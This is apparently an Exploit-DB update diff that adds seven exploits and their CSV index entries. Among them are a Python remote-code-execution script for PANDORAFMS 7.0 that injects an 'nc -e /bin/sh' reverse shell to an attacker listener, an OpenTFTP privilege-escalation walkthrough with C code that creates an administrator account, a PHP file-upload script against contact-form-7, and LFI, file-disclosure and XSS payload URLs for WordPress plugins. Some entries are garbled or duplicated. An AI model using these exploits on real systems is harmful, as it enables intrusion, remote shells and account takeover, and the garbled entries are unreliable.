DB: 2020-02-14

7 changes to exploits/shellcodes

OpenTFTP 1.66 - Local Privilege Escalation
Wordpress Plugin tutor.1.5.3 - Local File Inclusion
Wordpress Plugin tutor.1.5.3 - Persistent Cross-Site Scripting
Wordpress Plugin wordfence.7.4.5 - Local File Disclosure
Wordpress Plugin contact-form-7 5.1.6 - Remote File Upload
PANDORAFMS 7.0 - Authenticated Remote Code Execution
WordPress Plugin ultimate-member 2.1.3 - Local File Inclusion

exploits/php/webapps/48058.txt

@@ -0,0 +1,39 @@
+#  Tile: Wordpress Plugin tutor.1.5.3 - Local File Inclusion
+#  Author: mehran feizi
+#  Category: webapps
+#  Date: 2020-02-12
+#  vendor home page: https://wordpress.org/plugins/tutor/
+
+===================================================================
+Vulnerable page:
+/instructors.php
+===================================================================
+Vulnerable Source:
+3: $sub_page = tutor_utils ()->avalue_dot('sub_page', $_GET); 
+5: $include_file = tutor ()->path . "views/pages/{$sub_page}.php"; 
+7: include include $include_file; 
+requires:
+4: if(!empty($sub_page))
+6: if(file_exists($include_file))
+===================================================================
+Exploit:
+localhost/wp-content/plugins/tutor/views/pages/instructors.php?sub_page=[LFI]
+=================================================================================
+contact me:
+telegram: @MF0584
+gmail: mehranfeizi13841384@gmail.com
+===================================================================
+Vulnerable page:
+/instructors.php
+===================================================================
+Vulnerable Source:
+3: $sub_page = tutor_utils ()->avalue_dot('sub_page', $_GET); 
+5: $include_file = tutor ()->path . "views/pages/{$sub_page}.php"; 
+7: include include $include_file; 
+requires:
+4: if(!empty($sub_page))
+6: if(file_exists($include_file))
+===================================================================
+Exploit:
+localhost/wp-content/plugins/tutor/views/pages/instructors.php?sub_page=[LFI]
+=================================================================================

exploits/php/webapps/48059.txt

@@ -0,0 +1,18 @@
+#  Tile: Wordpress Plugin tutor.1.5.3 - Persistent Cross-Site Scripting
+#  Author: mehran feizi
+#  Category: webapps
+#  Date: 2020-02-12
+#  vendor home page: https://wordpress.org/plugins/tutor/
+
+===================================================================
+Vulnerable page:
+/Quiz.php
+===================================================================
+Vulnerable Source:
+473: echo echo $topic_id; 
+447: $topic_id = sanitize_text_field($_POST['topic_id']); 
+===================================================================
+Exploit:
+localhost/wp-content/plugins/tutor/classes/Quiz.php
+$_POST('topic_id') = <script>alert('mehran')</script>
+=================================================================================

exploits/php/webapps/48061.txt

@@ -0,0 +1,14 @@
+#  Tile: Wordpress Plugin wordfence.7.4.5 - Local File Disclosure
+#  Author: mehran feizi
+#  Category: webapps
+#  Date: 2020-02-12
+#  vendor home page: https://wordpress.org/plugins/wordfence/
+
+==============================================================================
+Vulnerable Source:
+5662: readfile readfile($localFile);
+5645: $localFile = ABSPATH . preg_replace('/^(?:\.\.|[\/]+)/', '', sanitize_text_field($_GET['file']));
+=================================================================================
+Exploit:
+localhost/wp-content/plugins/wordfence/lib/wordfenceClass.php?file=[LFD]
+=================================================================================

exploits/php/webapps/48062.txt

@@ -0,0 +1,39 @@
+#  Tile: Wordpress Plugin contact-form-7 5.1.6 - Remote File Upload
+#  Author: mehran feizi
+#  Category: webapps
+#  Date: 2020-02-11
+#  vendor home page: https://wordpress.org/plugins/contact-form-7/
+
+Vulnerable Source:
+134: move_uploaded_file move_uploaded_file($file['tmp_name'], $new_file))
+82: $file = $_FILES[$name] : null; 
+132: $new_file = path_join($uploads_dir, $filename); 
+122: $uploads_dir = wpcf7_maybe_add_random_dir($uploads_dir); 
+121: $uploads_dir = wpcf7_upload_tmp_dir(); 
+131: $filename = wp_unique_filename($uploads_dir, $filename); 
+122: $uploads_dir = wpcf7_maybe_add_random_dir($uploads_dir); 
+121: $uploads_dir = wpcf7_upload_tmp_dir(); 
+128: $filename = apply_filters('wpcf7_upload_file_name', $filename, $file['name'], $tag); 
+126: $filename = wpcf7_antiscript_file_name ($filename); 
+125: $filename = wpcf7_canonicalize ($filename, 'as-is'); 
+124: $filename = $file['name']; 
+82: $file = $_FILES[$name] : null; 
+82: $file = $_FILES[$name] : null; 
+78: ⇓ function wpcf7_file_validation_filter($result, $tag)
+
+
+Exploit:
+<?php
+$shahab="file.jpg";
+$ch = curl_init("http://localhost/wordpress/wp-content/plugins/contact-form-7/modules/file.php");
+curl_setopt($ch, CURLOPT_POST, true);
+curl_setopt($ch, CURLOPT_POSTFIELDS,
+array('zip'=>"@$shahab"));
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+$result = curl_exec($ch);
+curl_close($ch);
+print "$result";
+?>
+
+Location File:
+http://localhost/wordpress/wp-content/plugins/contact-form-7/file.jpg

exploits/php/webapps/48064.py

@@ -0,0 +1,77 @@
+# Exploit Title: PANDORAFMS 7.0 - Authenticated Remote Code Execution
+# Date: 2020-02-12
+# Exploit Author: Engin Demirbilek
+# Vendor homepage: http://pandorafms.org/
+# Version: 7.0
+# Software link: https://pandorafms.org/features/free-download-monitoring-software/
+# Tested on: CentOS
+# CVE: CVE-2020-8947
+
+#!/bin/python
+'''
+PANDORAFMS 7.0 Authenticated Remote Code Execution x4
+This exploits can be edited to exploit 4x Authenticated RCE vulnerabilities exist on PANDORAFMS.
+incase default vulnerable variable won't work, change the position of payload to  one of the following ip_src, dst_port, src_port
+
+Author: Engin Demirbilek
+Github: github.com/EnginDemirbilek
+CVE: CVE-2020-8947
+
+'''
+import requests
+import sys
+
+if len(sys.argv) < 6:
+	print "Usage: ./exploit.py http://url username password listenerIP listenerPort"
+	exit()
+
+url = sys.argv[1]
+user = sys.argv[2]
+password = sys.argv[3]
+payload = '";nc -e /bin/sh ' + sys.argv[4] + ' ' + sys.argv[5] + ' ' + '#'
+
+login = {
+	'nick':user,
+	'pass':password,
+	'login_button':'Login'
+}
+req = requests.Session()
+print "Sendin login request ..."
+login = req.post(url+"/pandora_console/index.php?login=1", data=login)
+
+payload = {
+	'date':"",
+	'time':"",
+	'period':"",
+	'interval_length':"",
+	'chart_type':"",
+	'max_aggregates':"1",
+        'address_resolution':"0",
+        'name':"",
+        'assign_group':"0",
+        'filter_type':"0",
+        'filter_id':"0",
+        'filter_selected':"0",
+        'ip_dst':payload,
+	'ip_src':"",
+	'dst_port':"",
+	'src_port':"",
+	'advanced_filter':"",
+	'aggregate':"dstip",
+	'router_ip':"",
+	'output':"bytes",
+	'draw_button':"Draw"
+}
+
+print "[+] Sendin exploit ..."
+
+exploit = req.post(url+"/pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view&pure=0",cookies=req.cookies, data=payload, headers={
+'User-Agent':'Mozilla/5.0 Gecko/20100101 Firefox/72.0',
+'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
+'Accept-Encoding':'gzip, deflate',
+'Content-Type':'application/x-www-form-urlencoded'})
+
+if exploit.status_code == 200:
+	print "[+] Everything seems ok, check your listener. If no connection established, change position of payload to ip_src, dst_port or src_port."
+else:
+	print "[-] Couldn't send the HTTP request, try again."

exploits/php/webapps/48065.txt

@@ -0,0 +1,19 @@
+# Title  : WordPress Plugin ultimate-member 2.1.3 - Local File Inclusion
+# Author : mehran feizi
+# Vendor : https://wordpress.org/plugins/ultimate-member/
+# Category : Webapps
+# Date : 2020-02-11
+# Vendor home page: https://wordpress.org/plugins/ultimate-member/
+
+Vulnerable Page:
+/class-admin-upgrade.php
+
+
+Vulnerable Source:
+354: if(empty($_POST['pack'])) else
+356: include_once include_once $this->packages_dir . DIRECTORY_SEPARATOR . $_POST['pack'] . DIRECTORY_SEPARATOR . 'init.php';
+
+
+Exploit:
+localhost/wp-content/plugins/worprees plugin bug dar/ultimate-member/includes/admin/core/class-admin-upgrade.php
+$_POST('pack')=<script>alert('xss')</script>

exploits/windows/local/48060.txt

@@ -0,0 +1,103 @@
+# Exploit Title:   OpenTFTP 1.66 - Local Privilege Escalation
+# Exploit Author:  boku
+# Date: 2020-02-12
+# Vendor Homepage: https://sourceforge.net/projects/tftp-server/
+# Software Link:   https://sourceforge.net/projects/tftp-server/files/tftp%20server%20single%20port/OpenTFTPServerSPInstallerV1.66.exe/download
+# Version:         1.66
+# Tested On:       Windows 10 (32-bit)
+
+# About:           
+# "MultiThreaded TFTP Server Open Source Freeware Windows/Unix for PXEBOOT, firmware load, support tsize, blksize, timeout Server Port Ranges, 
+# Block Number Rollover for Large Files. Runs as Service/daemon. Single Port version also available." 
+# Downloads: 43,284 This Week - https://sourceforge.net/projects/tftp-server/
+
+# Vulnerability Details:
+# On Windows, Open TFTP Server v1.66, suffers from insecure file & folder permissions. 
+# This allows a low-privilge, local attacker to escalate their permissions to Administrator; 
+# by replacing the 'TFTPServer' service binary with a maliciously-crafted, binary executable. 
+# The TFTP Server runs as an 'Auto_Start' Service, with 'LocalSystem' priviledges, after the 
+# default installation. After the attacker has planted the malicious binary, the code will 
+# be executed with System priviledges on the next boot of the windows device. See PoC below for details.
+
+## Service Information (there is also an Unquoted Service Path)
+C:\>sc qc TFTPServer
+SERVICE_NAME: TFTPServer
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 0   IGNORE
+        BINARY_PATH_NAME   : C:\OpenTFTPServer\OpenTFTPServerSP.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : Open TFTP Single Port Server
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+## Insecure Folder Permission
+C:\OpenTFTPServer BUILTIN\Administrators:(OI)(CI)(ID)F
+                  NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F
+                  BUILTIN\Users:(OI)(CI)(ID)R
+                  NT AUTHORITY\Authenticated Users:(ID)C
+                  NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(ID)C
+
+## Insecure File/Service Permission
+C:\OpenTFTPServer\OpenTFTPServerSP.exe BUILTIN\Administrators:(I)(F)
+                                       NT AUTHORITY\SYSTEM:(I)(F)
+                                       BUILTIN\Users:(I)(RX)
+                                       NT AUTHORITY\Authenticated Users:(I)(M)
+
+## Local Privilege Escalation Proof of Concept
+#0.  Download & install Open TFTP Server v1.66
+
+#1.  Create low privileged user & change to the user
+  C:\Users\lowPrivUser>net user lowprivuser | findstr /i "Membership Name" | findstr /v "Full"
+  User name                    lowPrivUser
+  Local Group Memberships      *Users
+  Global Group memberships     *None
+  C:\>whoami
+  mycomputer\lowprivuser 
+
+#2.  Move the Service EXE to a new name
+  C:\OpenTFTPServer>move OpenTFTPServerSP.exe ~OpenTFTPServerSP.exe
+        1 file(s) moved.
+
+#3.  Create malicious binary on kali linux
+  1) Download dependencies
+   root@kali# apt install gcc-mingw-w64-i686 wine64 -y
+  2) Add Admin User C Code
+   root@kali# cat addAdmin.c
+   #include<windows.h>
+   int main(void){
+    system("net user hacker mypassword /add");
+    system("net localgroup Administrators hacker /add");
+    WinExec("C:\\OpenTFTPServer\\~OpenTFTPServerSP.exe",0);
+    return 0;
+   }
+  3) Compile Code
+   root@kali# i686-w64-mingw32-gcc addAdmin.c -l ws2_32 -o OpenTFTPServerSP.exe
+
+#4. Transfer created 'OpenTFTPServerSP.exe' to the Windows Host 
+
+#5. Move the created 'OpenTFTPServerSP.exe' binary to the 'C:\OpenTFTPServer\' Folder
+  C:\>move C:\Users\lowPrivUser\Desktop\OpenTFTPServerSP.exe C:\OpenTFTPServer\
+        1 file(s) moved.
+  C:\>dir C:\OpenTFTPServer | findstr "OpenTFTPServerSP.exe"
+  02/12/2020  05:59 PM           288,659 OpenTFTPServerSP.exe
+  02/12/2020  06:38 PM           221,560 ~OpenTFTPServerSP.exe
+
+#6. Reboot the Computer
+
+#7. Look at that new Admin
+  C:\Users\lowPrivUser>net users hacker | findstr "Local name active"
+  User name                    hacker
+  Account active               Yes
+  Local Group Memberships      *Administrators       *Users
+
+  C:\Users\lowPrivUser>net localgroup Administrators
+  Alias name     Administrators
+  Comment        Administrators have complete and unrestricted access to the computer/domain
+
+  Members
+  -------------------------------------------------------------------------------
+  Administrator
+  boku
+  hacker

files_exploits.csv

@@ -10957,6 +10957,7 @@ id,file,description,date,author,type,platform,port
 48055,exploits/windows/local/48055.py,"MyVideoConverter Pro 3.14 - 'Output Folder' Buffer Overflow",2020-02-12,ZwX,local,windows,
 48056,exploits/windows/local/48056.py,"MyVideoConverter Pro 3.14 - 'TVSeries' Buffer Overflow",2020-02-12,ZwX,local,windows,
 48057,exploits/windows/local/48057.txt,"HP System Event Utility - Local Privilege Escalation",2020-02-12,hyp3rlinx,local,windows,
+48060,exploits/windows/local/48060.txt,"OpenTFTP 1.66 - Local Privilege Escalation",2020-02-13,boku,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -42351,3 +42352,9 @@ id,file,description,date,author,type,platform,port
 48040,exploits/cgi/webapps/48040.txt,"CHIYU BF430 TCP IP Converter - Stored Cross-Site Scripting",2020-02-11,Luca.Chiou,webapps,cgi,
 48042,exploits/php/webapps/48042.txt,"Vanilla Forums 2.6.3 - Persistent Cross-Site Scripting",2020-02-11,"Sayak Naskar",webapps,php,
 48047,exploits/php/webapps/48047.rb,"WordPress InfiniteWP - Client Authentication Bypass (Metasploit)",2020-02-11,Metasploit,webapps,php,80
+48058,exploits/php/webapps/48058.txt,"Wordpress Plugin tutor.1.5.3 - Local File Inclusion",2020-02-13,"Mehran Feizi",webapps,php,
+48059,exploits/php/webapps/48059.txt,"Wordpress Plugin tutor.1.5.3 - Persistent Cross-Site Scripting",2020-02-13,"Mehran Feizi",webapps,php,
+48061,exploits/php/webapps/48061.txt,"Wordpress Plugin wordfence.7.4.5 - Local File Disclosure",2020-02-13,"Mehran Feizi",webapps,php,
+48062,exploits/php/webapps/48062.txt,"Wordpress Plugin contact-form-7 5.1.6 - Remote File Upload",2020-02-13,"Mehran Feizi",webapps,php,
+48064,exploits/php/webapps/48064.py,"PANDORAFMS 7.0 - Authenticated Remote Code Execution",2020-02-13,"Engin Demirbilek",webapps,php,
+48065,exploits/php/webapps/48065.txt,"WordPress Plugin ultimate-member 2.1.3 - Local File Inclusion",2020-02-13,"Mehran Feizi",webapps,php,